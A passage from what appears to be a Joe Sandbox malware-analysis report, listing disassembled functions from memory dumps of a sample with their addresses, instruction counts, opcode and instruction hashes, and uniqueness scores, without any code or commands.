                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bdef6086246e0b2194f4cb142a90feab17bbaaf3611eae55b33c9a43a4f38cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E716939B04309CFDB148E68C890AAEB7B2FB49318F048167E402DB2A1DF74DA418B52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018DACE1 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e3e650c95cb65982701aae543c4869ee5097d62fac00f7c799a8fbf8ab780af0
                                                                                                                                                                                                                                                                            • Instruction ID: 58dd0c6f3455e09cbe7b13796496695cfae63bd747cb865089abba2a945efea7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3e650c95cb65982701aae543c4869ee5097d62fac00f7c799a8fbf8ab780af0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD810734615309DFEB19CE69D884BA9BBB1FF08355F254462E802DB3A1E739DE81CB11
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 058574A8 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7548867e352fa3e6f06eb98046f2071382c7a08d82c6af6f0374b67200ce2d09
                                                                                                                                                                                                                                                                            • Instruction ID: 7419d9e9306c7bf6632e2127a7efa260bcc9f4845dc54261a89c0107a2eafe16
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7548867e352fa3e6f06eb98046f2071382c7a08d82c6af6f0374b67200ce2d09
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA81E335A002188FCB15DF68C584A9EBBF6FF88360B1585A9EC16DB361DB30ED41CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D4AD3 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f0caee2420dcccc080e115baa537d76e7fbfebe3750117468651ba6827e103dd
                                                                                                                                                                                                                                                                            • Instruction ID: 20272722c732711571e75a6baf238a2de004b7468cd4f73d0d70755be5e773d9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0caee2420dcccc080e115baa537d76e7fbfebe3750117468651ba6827e103dd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C616934604248CFDB15CBA8D494BA9BBB5FF59308F1144AAE457DBBA1DB36DE40CB01
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F7CC8 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 042b8633f9abdcd3fcdf07a71dd9f809b473c3d31bb8a04f152436209b3feb18
                                                                                                                                                                                                                                                                            • Instruction ID: 16e7ca755e8f0d1b4d76c3172350bec88253c7665120702ad6cf3c949412b9ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 042b8633f9abdcd3fcdf07a71dd9f809b473c3d31bb8a04f152436209b3feb18
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B861F2B0D05218DFDB08CFA9E548AEDBBB2FB48301F10902AEA16B7354DB745A45DF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0585FA21 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3273f74766e5a793f7231c47dce907284cba66af5a7444d1074dd0352e2c3407
                                                                                                                                                                                                                                                                            • Instruction ID: a98a6c8c9e1a651c9f9cc9c90df84c2fab41bc2ccdb7f7976762a250440a09a5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3273f74766e5a793f7231c47dce907284cba66af5a7444d1074dd0352e2c3407
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A610874710214DFCB04DF68C898A6DBBB6BF89710F148169ED06DB3A5CB70AC41CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F63E8 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 35fbdd7d9884b38bf699170d114402233ef8cf616f9323e6d5e16693b256fcd5
                                                                                                                                                                                                                                                                            • Instruction ID: 569b676f4570156f2b9cfdcdc91902c07f05e5168e58284f86360ff1103624ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35fbdd7d9884b38bf699170d114402233ef8cf616f9323e6d5e16693b256fcd5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD613574D05248CFDF04DFA9D584ABDBBB2FB48300F20806AD616AB355EB349A45EF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F7CD8 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7986afa086c14f8c2c9b425170eb3312a5188451d66d59e1ce04f9635546633d
                                                                                                                                                                                                                                                                            • Instruction ID: cd1f5e271e98d03b788a3b873a35c363eafeab8f2b116f9bd39e04cc8f2e1548
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7986afa086c14f8c2c9b425170eb3312a5188451d66d59e1ce04f9635546633d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C961E4B4D01218DFDB08CFA9E544AEDBBB2FB48301F10902AEA15B7344DB745A45DF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0585A778 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1eac48cf3370f98dd778f909181c85d67150d8378c07a585ecba88029ab1bf76
                                                                                                                                                                                                                                                                            • Instruction ID: d5a1a152dbf68f18668a8a8d1de6924241e4251be1506f579aabde33273ebb7d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1eac48cf3370f98dd778f909181c85d67150d8378c07a585ecba88029ab1bf76
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77515034B106099FCB09DF64E499AAE7BB6FFC8711F008119F9029B3A4DF749946DB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018DBC68 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e1bd151ad7dcef34e23b035932e83d85ac283e28f1c551e505969f3e213ff7d5
                                                                                                                                                                                                                                                                            • Instruction ID: 9f5a3049ba3c955ec9431e023b0037f6c61b0352e24ef9212fdac4948bb467d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1bd151ad7dcef34e23b035932e83d85ac283e28f1c551e505969f3e213ff7d5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4414435A0431DDBDB10CF99C950BAEB7A1FB4A360F12453AE511EB390DA79DE408B91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018DBC60 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2847bd4e5771d01617f1cee446780bceab55ec5fad59a097818d7f6771419236
                                                                                                                                                                                                                                                                            • Instruction ID: 19ddc13aafe940e04d5179ac1fa2066a0ed496bca6e28a744a5c5dcb0a03acd0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2847bd4e5771d01617f1cee446780bceab55ec5fad59a097818d7f6771419236
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94416439A0430DDFDB10CF59C950BAEB7A1FB4A320F12413AE511EB390DA79DE418B91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 058521C8 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 05e78e2cbae98878730562824d6daca1ea808a9d61d50aaa9c9e22897183bdb7
                                                                                                                                                                                                                                                                            • Instruction ID: dcbbfc852d1d0256cb280f18859adf519a6c7700f44ad7fbd635d8f6ee0142ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05e78e2cbae98878730562824d6daca1ea808a9d61d50aaa9c9e22897183bdb7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C414938B002099FCB15DB68D884BAABBB6FB84320F54806DED06DB294DF35EC41CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D0B49 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b059ff5d1a80691cfa3f9102689158b4de01988f5d52d940cece4c6b3e92eb64
                                                                                                                                                                                                                                                                            • Instruction ID: f4a88eff1ef47ced88c51cfdf4aee1e1ad4aacc4e2f39ad6704948b5957b922c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b059ff5d1a80691cfa3f9102689158b4de01988f5d52d940cece4c6b3e92eb64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF31B431B0930A8FDB108E7999807BB7BA5EB84348F55447AF806CB291E675CF458751
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F80E0 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 98f09020d29e8e57231869c495d8b3ea112658c44cdb36cf96eb005adfa3f33f
                                                                                                                                                                                                                                                                            • Instruction ID: a9d54b16dfbef0f901a33a002c1cf38eeef0cadb520f114a4bdb37891301d59e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98f09020d29e8e57231869c495d8b3ea112658c44cdb36cf96eb005adfa3f33f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851E570E05208CFDB58DFB9D994A9DBBB2BF89304F20812EE416AB365DB319941DF41
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D8118 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e51d3c5d9178990db890ff4046e7b8d0e41c8e5faeeaf2016eb5aa8a8d604c7b
                                                                                                                                                                                                                                                                            • Instruction ID: a24251fee6e72b36022c82eb5e1ab8e8a940723068e7237ca7c81319c01c8b17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e51d3c5d9178990db890ff4046e7b8d0e41c8e5faeeaf2016eb5aa8a8d604c7b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE419A74A40619CFCF159FB8D8046AEBBF5FB8A305F10497AE502EB340C7758A4ACB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D8128 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c28d953f88a4638b193f36414cbcef83126724b0fcd4aeb84a99de8294fe88ee
                                                                                                                                                                                                                                                                            • Instruction ID: d5e594c0a910e8edac0f663eaa6cc2c6541ab8e3a8227d9c238feaccc90d8173
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c28d953f88a4638b193f36414cbcef83126724b0fcd4aeb84a99de8294fe88ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0415B74A40219CFCF159FB8D8046AEBBB6FB8E305F50493AE512EB340C7758A45CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D736F Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bb4c74d5aea3191e92210322570aabfae2ab4f9919ad37aadf04e5c8ae1fb62e
                                                                                                                                                                                                                                                                            • Instruction ID: 5fa097b1ccf2e873d20ad570915973b0e15248f8d7bdfbb02fbc874e80e8e770
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb4c74d5aea3191e92210322570aabfae2ab4f9919ad37aadf04e5c8ae1fb62e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C93126326093819FD7178B28D8515ED7FB2EF9A318B4581EBE441CF262E639CD0AC761
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05858870 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 45af622b24575c515d6e031852f3bfa19f46b89c414bf4b565ed7b8d050752e7
                                                                                                                                                                                                                                                                            • Instruction ID: 5616823e898bfc109c73d2f94a8fdee6458474a61f237409bd6adab07d06f057
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45af622b24575c515d6e031852f3bfa19f46b89c414bf4b565ed7b8d050752e7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 213190353006058FCB25AB38D45892ABBA6FFC9220725806EEC56CB3A5DF35DC06DB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F80D4 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c6b25960f609306a22bdf06124544059ffa6262afb26ce9d35937fdc660fcd79
                                                                                                                                                                                                                                                                            • Instruction ID: 1d7b09b22982c8ec4eb13bba0e18d2ebc790633f306a94c070c0de66bc122b7b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6b25960f609306a22bdf06124544059ffa6262afb26ce9d35937fdc660fcd79
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0941D770E05208CFDB58DFB9D954A9DBBB2BF89300F20812EE41AAB365DB319941DF41
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05851500 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ca85134dac4c238eb004150cba62cfee570955aa2c41903a636e6f8450e12c45
                                                                                                                                                                                                                                                                            • Instruction ID: 11936d6c1bef71a22de88cd4ecc8a73b83c8f93df18ca30ce95e08eb6829488a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca85134dac4c238eb004150cba62cfee570955aa2c41903a636e6f8450e12c45
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C03104367083449FCB058B6DE848B99BFB5EB46330B5580ABFC92CB262D6348C05C751
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 03091096 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750677906.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_3090000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e332795fe1c7aa0f6984de85b1a691065df409dff820e985cdaa934e7b78eeec
                                                                                                                                                                                                                                                                            • Instruction ID: 6c48a239642662800b407704c00ff32e33b197e2789ea90ee56a7f254b001a08
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e332795fe1c7aa0f6984de85b1a691065df409dff820e985cdaa934e7b78eeec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61418E38A0114ADFDB54CF58C98099DBBB2FF88314F24899AE815AB355C732ED52DF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05857408 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7a21f9750d4487d480b1fe98e5f59e9c08210f443106c7594ec7c66e4f9faeac
                                                                                                                                                                                                                                                                            • Instruction ID: c782cf8dd3e64ca4f5a4f51be1a26a14287ea5812db19ac8c05b2d8502937f0c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a21f9750d4487d480b1fe98e5f59e9c08210f443106c7594ec7c66e4f9faeac
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31C532A093589FCB12CB59D840EDE7FB9EF4A260F0580A7ED05DB261D630AD05C7E1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

